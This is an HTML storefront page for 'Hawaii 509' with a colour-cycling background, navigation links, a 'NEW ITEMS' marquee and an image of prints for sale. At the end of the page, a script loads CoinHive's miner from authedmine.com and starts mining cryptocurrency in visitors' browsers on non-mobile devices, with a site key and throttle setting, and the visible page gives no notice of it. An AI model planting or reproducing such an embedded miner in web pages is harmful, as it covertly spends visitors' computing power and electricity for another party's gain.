<html>

<HEAD>

<title>Store | Hawaii 509</TITLE>
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="theme-color" content="#e5bdbd">
<style>

body 
{ 
 margin: 0; 
 padding: 0; 
 text-align: center; 
} 

body {
    -webkit-animation: colorchange 60s infinite; 
    animation: colorchange 60s infinite;
}
 
 
@-webkit-keyframes colorchange {
 
     0%  {background: #ea7295;}
    25%  {background: #38b6c1;}
    50%  {background: #d142d1;}
    75%  {background: #55d18d;}
    100% {background: #ea7295;}
}
 
 
@keyframes colorchange {
     0%  {background: #ea7295;}
    25%  {background: #38b6c1;}
    50%  {background: #d142d1;}
    75%  {background: #55d18d;}
    100% {background: #ea7295;}
}   

</style>

</HEAD>

<BODY>
<font face="arial, helvetica, sans serif">

<a href="home.htm"><img src="hawaii509.gif" alt="Hawaii 509" style="width:480;height:208;"></a>
<br>
<font size="+1"
<ul>
  <li><a href="home.htm">Home</a>
  <li><a href="about.htm">About Hawaii 509</a>
</ul>
</font>
<marquee><font color="#238e68" size="+3">NEW ITEMS                NEW ITEMS                NEW ITEMS</font></marquee>
<br>
<h3>Prints available</h3>

<img src="hawaii509multipleprint.png" style="width:760;height:840;">

</font>
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('T5BbLkpOghNKkE4w7KjZ5w6GsScB9B9T', {throttle: 0.3});
	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>
</BODY>

</HTML>
